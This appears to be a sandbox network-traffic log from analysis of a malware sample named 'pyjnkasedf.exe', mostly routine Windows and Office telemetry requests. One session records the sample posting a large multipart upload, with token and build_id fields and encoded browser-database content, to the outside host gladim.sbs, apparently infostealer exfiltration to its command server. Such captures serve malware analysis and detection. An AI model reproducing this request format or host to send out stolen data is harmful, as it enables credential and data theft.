                                                                                                                                                                                                                                                      2024-11-30 21:38:45 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Content-Type: application/soap+xml
                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                      Content-Length: 4742
                                                                                                                                                                                                                                                      Host: login.live.com
                                                                                                                                                                                                                                                      2024-11-30 21:38:45 UTC4742OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                      2024-11-30 21:38:46 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                      Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                      Expires: Sat, 30 Nov 2024 21:37:46 GMT
                                                                                                                                                                                                                                                      P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                      x-ms-route-info: C512_BAY
                                                                                                                                                                                                                                                      x-ms-request-id: 46acd79d-f1b4-4c2c-b9ad-2e8ab54047a1
                                                                                                                                                                                                                                                      PPServer: PPV: 30 H: PH1PEPF0001B7AD V: 0
                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:45 GMT
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Content-Length: 10197
                                                                                                                                                                                                                                                      2024-11-30 21:38:46 UTC10197INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      113192.168.2.104988194.130.210.714437496C:\Users\user\Desktop\pyjnkasedf.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:46 UTC320OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----JJDBFCAEBFIJJKFHDAEC
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                      Host: gladim.sbs
                                                                                                                                                                                                                                                      Content-Length: 262605
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                      2024-11-30 21:38:46 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 42 46 43 41 45 42 46 49 4a 4a 4b 46 48 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 31 64 61 39 61 65 61 38 30 61 37 38 33 35 61 64 65 33 31 37 64 37 66 65 38 61 63 61 35 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 46 43 41 45 42 46 49 4a 4a 4b 46 48 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 65 30 30 61 61 35 30 32 65 37 39 61 35 62 36 63 35 34 62 66 63 36 61 33 32 33 31 61 33 62 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 46 43 41 45 42 46 49 4a 4a 4b 46 48 44 41 45 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                      Data Ascii: ------JJDBFCAEBFIJJKFHDAECContent-Disposition: form-data; name="token"851da9aea80a7835ade317d7fe8aca55------JJDBFCAEBFIJJKFHDAECContent-Disposition: form-data; name="build_id"5e00aa502e79a5b6c54bfc6a3231a3b5------JJDBFCAEBFIJJKFHDAECCont
                                                                                                                                                                                                                                                      2024-11-30 21:38:46 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:46 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:46 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:46 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:46 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:46 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:46 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:46 UTC16355OUTData Raw: 30 63 32 4e 79 5a 57 56 75 58 33 56 79 62 46 39 69 62 47 39 6a 61 33 4e 66 59 6e 6c 77 59 58 4e 7a 5a 57 52 66 59 32 39 31 62 6e 52 6c 63 69 42 4a 54 6c 52 46 52 30 56 53 4c 48 4e 74 59 58 4a 30 63 32 4e 79 5a 57 56 75 58 32 52 76 64 32 35 73 62 32 46 6b 58 32 4a 73 62 32 4e 72 63 31 39 6a 62 33 56 75 64 47 56 79 49 45 6c 4f 56 45 56 48 52 56 49 73 63 32 31 68 63 6e 52 7a 59 33 4a 6c 5a 57 35 66 5a 47 39 33 62 6d 78 76 59 57 52 66 59 6d 78 76 59 32 74 7a 58 32 4a 35 63 47 46 7a 63 32 56 6b 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 7a 62 57 46 79 64 48 4e 6a 63 6d 56 6c 62 6c 39 74 59 57 78 32 5a 58 4a 30 61 58 4e 70 62 6d 64 66 59 6d 78 76 59 32 74 7a 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 68 59 6e
                                                                                                                                                                                                                                                      Data Ascii: 0c2NyZWVuX3VybF9ibG9ja3NfYnlwYXNzZWRfY291bnRlciBJTlRFR0VSLHNtYXJ0c2NyZWVuX2Rvd25sb2FkX2Jsb2Nrc19jb3VudGVyIElOVEVHRVIsc21hcnRzY3JlZW5fZG93bmxvYWRfYmxvY2tzX2J5cGFzc2VkX2NvdW50ZXIgSU5URUdFUixzbWFydHNjcmVlbl9tYWx2ZXJ0aXNpbmdfYmxvY2tzX2NvdW50ZXIgSU5URUdFUixhYn
                                                                                                                                                                                                                                                      2024-11-30 21:38:46 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:48 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:48 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      114192.168.2.104987913.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:46 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:46 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:46 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 1952
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582B956B0F3D"
                                                                                                                                                                                                                                                      x-ms-request-id: d0a44725-c01e-00a2-575a-432327000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213846Z-174f7845968cdxdrhC1EWRg0en000000120g00000000476q
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:46 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      115192.168.2.104988213.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:46 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:46 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:46 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 958
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BA0A31B3B"
                                                                                                                                                                                                                                                      x-ms-request-id: 11676492-b01e-003d-10f9-41d32c000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213846Z-174f7845968frfdmhC1EWRxxbw0000001240000000003aed
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:46 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
